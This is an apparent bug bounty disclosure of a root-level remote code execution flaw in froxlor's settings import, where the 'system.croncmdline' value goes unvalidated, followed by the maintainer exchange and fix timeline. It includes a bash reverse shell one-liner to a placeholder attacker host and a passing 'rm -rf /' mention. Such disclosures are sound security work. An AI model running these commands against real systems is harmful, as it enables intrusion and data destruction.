Remote Code Execution in "Import Settings" feature in froxlor/froxlor


Reported on

Feb 4th 2023


Due to Improper data validation in "Import Settings" feature, an authenticated attacker can send crafted settings with malicious payload inside "system.croncmdline" value.

Step to reproduce

Requirement: PHP code must be executed on attacker machine

  • Step 1: Attacker run web server and deliver foo.txt file. The contain of this file is a reverse shell to attacker machine, for example:
bash -i >& /dev/tcp/{ATTACKER-IP}/{ATTACKER-PORT} 0>&1
  • Step 2: Run file and required by this exploit

Proof of Concept


This vulnerability can be exploited to cause a Remote Code Execution on target web server with highest privilege user (root)

We are processing your report and will contact the froxlor team within 24 hours. 2 months ago
We have contacted a member of the froxlor team and are waiting to hear back 2 months ago
2 months ago


Setting reload commands for the Cronjob is part of froxlor. You could also just specify a script that runs rm -rf / if you want. Also the required permissions for these actions is high

Michael Kaufmann modified the Severity from Critical (9.9) to Critical (9.1) 2 months ago
froxlor/froxlor maintainer
2 months ago

Hi Michael, Thank you for your feedback. However, in this Line of code, the croncmdline parameter was validated by using regex (it only accepted /^[a-z0-9/._- ]+$/i). But by using the import settings feature, not validation or filter at all, so I think it was a critical bug if any admin was compromised and then the attacker can totally compromised the system (because the cron job was run as root privilege)

froxlor/froxlor maintainer has acknowledged this report 2 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Michael Kaufmann validated this vulnerability 2 months ago
blakduk has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Michael Kaufmann marked this as fixed in 2.0.11 with commit aa48ff 2 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Feb 17th 2023
Michael Kaufmann published this vulnerability a month ago
to join this conversation